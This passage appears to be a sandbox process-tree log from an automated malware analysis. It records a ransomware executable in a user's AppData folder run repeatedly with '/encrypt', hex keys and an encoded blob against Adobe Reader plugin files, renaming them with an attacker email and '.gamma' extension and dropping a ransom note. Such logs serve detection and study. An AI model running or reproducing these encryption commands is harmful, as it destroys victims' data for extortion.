C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp.id-DA208E5B.[[email protected]].gamma"5⤵PID:6636
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp.id-DA208E5B.[[email protected]].gamma"5⤵PID:6644
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp.id-DA208E5B.[[email protected]].gamma"5⤵PID:6652
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#Decrypt_Files_ReadMe#.rtf"5⤵PID:6752
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\z1Tl1TIF-nyCXSXq7.[[email protected]]"5⤵PID:6828
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Flash.mpp.id-DA208E5B.[[email protected]].gamma"5⤵PID:6180
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.id-DA208E5B.[[email protected]].gamma"5⤵PID:6188
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp.id-DA208E5B.[[email protected]].gamma"5⤵PID:6200
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Real.mpp.id-DA208E5B.[[email protected]].gamma"5⤵PID:6208
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp.id-DA208E5B.[[email protected]].gamma"5⤵PID:6216
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD.id-DA208E5B.[[email protected]].gamma"5⤵PID:1944
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.SYX.id-DA208E5B.[[email protected]].gamma"5⤵PID:5640
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD.id-DA208E5B.[[email protected]].gamma"5⤵PID:5900
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng.id-DA208E5B.[[email protected]].gamma"5⤵PID:4448
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng.id-DA208E5B.[[email protected]].gamma"5⤵PID:3040
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD.id-DA208E5B.[[email protected]].gamma"5⤵
- System Location Discovery: System Language Discovery
PID:6184
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst.id-DA208E5B.[[email protected]].gamma"5⤵PID:1000
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.id-DA208E5B.[[email protected]].gamma"5⤵
- System Location Discovery: System Language Discovery
PID:3700
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d.id-DA208E5B.[[email protected]].gamma"5⤵PID:5856
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d.id-DA208E5B.[[email protected]].gamma"5⤵PID:3368
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d.id-DA208E5B.[[email protected]].gamma"5⤵PID:5100
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d.id-DA208E5B.[[email protected]].gamma"5⤵PID:3480
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d.id-DA208E5B.[[email protected]].gamma"5⤵PID:3844
-
-
